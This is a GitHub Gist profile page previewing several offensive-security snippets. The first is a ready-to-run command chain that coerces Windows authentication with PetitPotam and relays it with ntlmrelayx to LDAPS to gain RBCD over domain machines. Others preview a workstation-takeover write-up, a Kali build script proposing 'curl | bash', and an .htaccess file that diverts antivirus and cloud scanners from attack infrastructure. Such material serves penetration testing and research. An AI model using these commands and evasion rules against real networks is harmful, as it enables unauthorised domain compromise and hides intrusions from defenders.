Skip to content

Instantly share code, notes, and snippets.

View BaffledJimmy's full-sized avatar

BaffledJimmy BaffledJimmy

21 followers · 8 following
View GitHub Profile
@BaffledJimmy
BaffledJimmy / webclient-rbcd.sh
Created March 27, 2023 11:03 — forked from zimnyaa/webclient-rbcd.sh
PetitPotam WebDAV coerced authentication + LDAPS relaying
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local
# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da
# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
@BaffledJimmy
BaffledJimmy / buildscript.sh
Created February 3, 2022 13:39
#+++
# NOTES:
# * This does currently run ‘ok’ as a sh script. Lots still to do obvs...
# * Run as kali *USER* - SUDO is coded where necessary. Don’t run as ROOT.
#
# * Please add new ‘stuff’ to the bottom of the script.
#
# * I suggest we do this script as a GIST for now…
# * ...so we can “$ curl -sL <URL> | bash” (and easier to edit/read)? [SE9875]
#
@BaffledJimmy
BaffledJimmy / Workstation-Takeover.md
Created July 29, 2021 07:32 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@BaffledJimmy
BaffledJimmy / .htaccess
Created November 3, 2018 14:58 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
RewriteEngine On
RewriteOptions Inherit
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# Class A Exclusions. Includes large ranges from Azure & AWS
# Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device